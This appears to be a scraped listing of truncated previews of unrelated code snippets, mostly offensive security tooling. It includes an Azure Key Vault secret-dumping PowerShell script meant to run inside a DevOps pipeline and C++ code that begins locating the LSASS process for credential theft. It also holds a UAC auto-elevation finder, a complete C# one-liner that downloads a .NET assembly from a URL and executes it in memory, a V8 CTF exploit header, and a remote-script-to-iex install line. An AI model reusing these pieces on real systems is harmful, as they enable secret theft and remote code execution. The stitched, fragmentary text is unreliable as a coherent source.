| #!/usr/bin/env python3 | |
| # Happy Fam | |
| # LQL-Driven Parent and Child Process Analyzer | |
| # Lacework Labs | |
| # v0.1 - May 2022 | |
| # greg.foss@lacework.net | |
| ''' | |
| Licensed under the Apache License, Version 2.0 (the "License"); |
Cloud Security Orienteering: Checklist
by Rami McCarthy
via TL;DR sec
How to orienteer in a cloud environment, dig in to identify the risks that matter, and put together actionable plans that address short, medium, and long term goals.
Based on the Cloud Security Orienteering methodology.
| #Somewhat stolen from PowerZure Get-AzureKeyVaultContent and Show-AzureKeyVaultContent , thanks hausec! | |
| #reimplemented by Flangvik to run in a single "Azure PowerShell" Agent job, inside an DevOps Pipeline | |
| #Suppress warnings for clean output | |
| Set-Item Env:\SuppressAzurePowerShellBreakingChangeWarnings "true" | |
| #Get all Azure KeyVaults from currently selected/scoped subscription | |
| #This connection is known as an "Service connection",and in terms of accessing Azure resources, uses either Service principal or Managed identity | |
| $vaults = Get-AzKeyVault |
| #define _CRT_SECURE_NO_WARNINGS | |
| #include <Windows.h> | |
| #include <Psapi.h> | |
| #include <TlHelp32.h> | |
| #include <iostream> | |
| DWORD GetLsassPid() { | |
| PROCESSENTRY32 entry; | |
| entry.dwSize = sizeof(PROCESSENTRY32); |
| # Find Autoelevate executables | |
| Write-Host "System32 Autoelevate Executables" -ForegroundColor Green -BackgroundColor Black | |
| Select-String -Path C:\Windows\System32\*.exe -pattern "<AutoElevate>true" | |
| Write-Host "`nSysWOW64 Autoelevate Executables" -ForegroundColor Green -BackgroundColor Black | |
| Select-String -Path C:\Windows\SysWOW64\*.exe -pattern "<AutoElevate>true" |
| public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } } |
| // | |
| // Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018. | |
| // N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d | |
| // | |
| // Scroll down do "BEGIN EXPLOIT" to skip the utility functions. | |
| // | |
| // Copyright (c) 2018 Samuel Groß | |
| // | |
| // |
A simple, dependency free, Golang egress buster using @mubix letmeoutofyour.net and @bhinfosecurity allports.exposed services.
Save the main.go file and either go run main.go or build it with go build -o go-out main.go, moving the resultant binary to your place of choice.
| # Description: Boxstarter Script | |
| # Author: Jess Frazelle <jess@linux.com> | |
| # Last Updated: 2017-09-11 | |
| # | |
| # Install boxstarter: | |
| # . { iwr -useb http://boxstarter.org/bootstrapper.ps1 } | iex; get-boxstarter -Force | |
| # | |
| # You might need to set: Set-ExecutionPolicy RemoteSigned | |
| # | |
| # Run this boxstarter by calling the following from an **elevated** command-prompt: |
